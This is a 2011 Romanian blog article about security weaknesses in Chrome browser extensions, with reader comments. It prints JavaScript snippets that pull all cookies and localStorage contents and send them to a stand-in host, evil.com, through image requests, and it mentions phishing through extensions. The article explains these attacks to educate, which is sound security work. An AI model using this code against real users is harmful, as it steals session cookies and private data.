• Acasă
  • Despre noi
  • Autori
  • Mărturii
  • Arhivă
  • Trimite Articol
  • Contact

WORLDIT

Lumea în 1 și 0.

  • Știri
    • Tehnologie
    • Tehnologie mobilă
    • Securitate
    • Developers
    • Știință
    • Benzi desenate
    • Jocuri
    • Intern
  • Tehnic
    • Browser
    • C#
    • C/C++
    • Challenge
    • HTML/CSS
    • Javascript, Ajax, jQuery
    • Open Source
    • PHP
    • Python
    • Securitate IT
    • Socializare
    • WordPress
    • Altele
  • Recenzii
  • Interviuri
  • Evenimente

Vulnerabilitatile aplicatiilor web din perspectiva extensiilor

4
  • Publicat de Andrei Avădănei
  • în Fără categorie
  • — 22 ian., 2011 at 1:14 pm

In ultima perioada Google Chrome a atins cote de crestere impresionante comparativ cu orice alt browser din concurenta. A ajuns sa fie unul dintre cele mai populare motoare de navigare pe Internet intr-un timp foarte scurt. Mozilla Firefox are un sistem de pluginuri ce permit extinderea browserelui, facandu-l mult mai puternic pentru un utilizator obisnuit si nu numai. Google Chrome se bucura de un sistem similar. Pentru cei nefamiliari, extensiile Google Chrome sunt mici aplicatii care pot modifica sau spori functionalitatea browserului. Dezvoltatorii scriu aceste aplicatii in HTML (incluzand si HTML 5), Javascript si CSS. Folosind astfel de tehnologii, problemele de securitate pot aparea oricand.

Pentru a descoperi vulnerabilitati si apoi a le exploata in extensiile Chrome trebuie sa intelegi de ce Chrome se intituleaza unul din cele mai sigure browsere din lume, apoi trebuie sa fii familiar cu HTML 5, Javascript si nu in ultimul rand cu dezvoltarea extensiilor.

Una dintre extensiile cele mai populare, Google Mail Checker Plus, a avut de suferit de pe urma acestui tip probleme de securitate. In imaginea de mai jos a fost injectat cu succes, folosind un iframe.

Un exemplu simplu de executare a unui payload

document.body.innerHTML = ”;
img = new Image();
img.src = ‘http://evil.com/imagine.jpg’;
document.body.appendChild(img);

Exploatarea acestei vulnerabilitati folosind cookie stealling este mai dificila pentru ca apelarea document.cookie este inutila, nereturnand nimic. Trebuie folosite functii speciale implementate si suportate de browser. Pe langa asta extensia trebuie sa aibe permisiuni de utilizare a cookie-urilor site-ului in cauza. Asta inseamna ca prea mult acces din partea unui plugin poate sa permita furtul de date a mai multor website-uri.

Permisiuni pentru folosirea cookie-urilor

{
“name”: “My extension”,
…
“permissions”: [
"cookies",
"*://*.google.com"
],
…
}

Copierea tuturor cookie-urilor din extensia Chrome si trimiterea lor pe un site remote

chrome.cookies.getAll({}, function(cookies) {
var dump = ‘COOKIES: ‘;
for (var i in cookies) {
        dump += cookies[i].domain + ‘:’ + cookies[i].name + ‘:’ + cookies[i].value + ‘ | ‘;
}
img = new Image();
img.src = ‘http://evil.com/imagine.jpg?’ + dump;
document.body.appendChild(img);
});

Abuzul de permisiuni

Atacurile in browser nu se opresc aici. In functie de accesul de care dispun, furtul de date se poate extinde chiar si la semnele de carte, istorie, taburi samd. Atacurile pot abuza de extensiile ce stocheaza date private in local storage. Toate informatiile se pot extrage destul de simplu :

var dump = ' LOCALSTORAGE: ';
for (i = 0; i < localStorage.length; i++ ) {
dump += "KEY: " + localStorage.key(i);
dump += " VALUE: " + localStorage.getItem(localStorage.key(i)) + " | ";
}
img = new Image();
img.src = 'http://evil.com/sniff.jpg?' + dump;
document.body.appendChild(img);

Trebuie tinut cont ca e doar un exemplu, se pot face mult mai multe lucruri abuzand de permisiunile disponibile.

Phishing

Din atacurile obisnuite nu poate lipsi phishing-ul. Este evident ca poti afisa utilizatorului un sistem de autentificare ce sa-i ceara datele confidentiale pentru a reautentifica.

Scurgeri de date prin JSON

JSON este un format de stocare a informatiilor si de folosire a lor rapid. Totusi, exista numeroase articole de securitate ce prezinta riscurile folosirii inadecvate a acestei tehnologii. Daca extensia este codata intr-un mod gresit atunci exista un risc foarte mare ca extensia sa poata executa cod malitios fara a sti.

Concluzie

Desi aceste probleme exista, rezolvarea lor nu este dificila iar crearea lor intr-un mod corect te poate scapa de oricare dintre acestea. Totusi, problemele pot aparea si exista asa ca stati cu ochii in patru. Trebuie sa realizati ca acest articol este un ciot, vulnerabilitatile in cauza putand face mult mai multe. Puteti citi mai multe aici si aici.

Daca acest articol contine o greseala, selecteaza cuvintele sau fraza gresita si tasteaza combinatia de taste Shift + Enter sau apasa click aici pentru a o raporta. Multumim!

— Andrei Avădănei a scris 1246 articole

Andrei scrie pe worldit.info din vara lui 2011. Este fondatorul Asociatiei Centrul de Cercetare in Securitate Informatica din Romania - CCSIR si coordoneaza DefCamp, cea mai importanta conferinta de securitate informatica & hacking din Europa Centrala si de Est. Andrei ofera in cadrul Bit Sentinel servicii de securitate informatica, penetration testing, security management, recuperarea de pe urma unui atac cibernetic, training-uri si workshop-uri.

  • Articolul anterior Google Page Rank Update – Ianuarie 2011 ne-a afectat si pe noi
  • Articolul următor Doar 10 zile pana la IPcalipsa!

4 Comentarii

  1. RoGeek spune:
    ianuarie 23, 2011 la 2:59 am

    Ce are fi sa folosim Google Chrome incognito mode ?

  2. Andrei Avădănei spune:
    ianuarie 23, 2011 la 10:07 am

    Nu prea ajuta. Arunca o privire peste asta.

  3. Sabin Buraga spune:
    februarie 9, 2011 la 6:03 pm

    Andrei, daca prelucrezi articole, ar trebui sa precizezi si sursa originala, mai ales ca ai utilizat imaginile originale: http://oxdef.info/papers/ext/chrome.html

  4. Andrei Avădănei spune:
    februarie 9, 2011 la 8:07 pm

    Salut,

    Sunt total deacord cu tine, doar ca nu tin minte sa fi folosit ca resurse decat materialele precizate la finalul articolului :
    http://www1.vul.kr/web-application-vulnerabilities-in-context-of-browser-extensions
    http://www.techrepublic.com/blog/security/chrome-extensions-potential-cracks-in-the-armor/3523

    Imi cer scuze ca nu a fost exact sursa originala, insa foarte rar omit autorii la informatii de genul acestora. 🙂


  • Facebook

    WorldIT.info
  • Ultimele Atacuri Cibernetice din Romania – RO Hacked

    • imacoolat-curat.ro
      | Published: februarie 3, 2020 - 2:00 am
    • hotel-palace.ro
      | Published: februarie 2, 2020 - 2:00 am
    • www.tahometru.ro
      | Published: februarie 1, 2020 - 2:00 am
    • alexisart.ro
      | Published: ianuarie 30, 2020 - 2:00 am
    • justshop.ro
      | Published: ianuarie 29, 2020 - 2:00 am
    RO Hacked este registrul atacurilor cibernetice din România.
  • Caută

  • Articole Recomandate

    • Recent Posts
    • Tags
    • Număr record de participanți la DefCamp 2015, cel mai important eveniment dedicat securității cibernetice din Europe Centrala si de Estdecembrie 2, 2015
    • La DefCamp 2015 vei afla prin ce tehnici pot fi evitate măsurile de securitate ale sistemelor informatice criticeoctombrie 16, 2015
    • Ultima sansa sa rezervi bilete de tip Early Bird la DefCamp 2015septembrie 1, 2015
    • 15 sfaturi despre cum poti deveni un programator bun venite de la specialisti romaniaugust 4, 2015
    • algoritmica Android antivirus Apple Avadanei Andrei benzi desenate BitDefender blog browser C++ Chrome concurs eveniment Facebook Firefox Google google chrome hacking html5 infografic informatica internet Internet Explorer IT javascript linux Microsoft Mozilla Firefox online PHP programare retea sociala review Romania securitate Tehnologie Twitter web Windows Windows 7 Wordpress WorldIT worldit.info Yahoo! YouTube
  • ianuarie 2021
    L Ma Mi J V S D
    « dec.    
     123
    45678910
    11121314151617
    18192021222324
    25262728293031
  • Link-uri Sponsorizate

    • laptop second hand

    • Calculatoare Second Hand

    • cod voucher pc garage

  • Home
  • Vulnerabilitatile aplicatiilor web din perspectiva extensiilor
  • Important

    • Bit Sentinel
    • Centrul de Cercetare în Securitate Informatică din România
    • DefCamp
  • Prieteni

    • BetiT.ro
    • bijuterii handmade
    • Computerica | Resurse gratuite PC
    • Descopera.org
    • Gadgeturi si IT – Giz.ro
  • Prieteni

    • PC – Config
    • RO Hacked
    • Stiri IT

Copyright © 2009-2014 WORLDIT. Toate drepturile Rezervate.
Termeni și condiții | Contact | Licența Creative Commons

Multumim foarte mult ca ne-ai raportat greseala! O vom remedia in cel mai scurt timp posibil.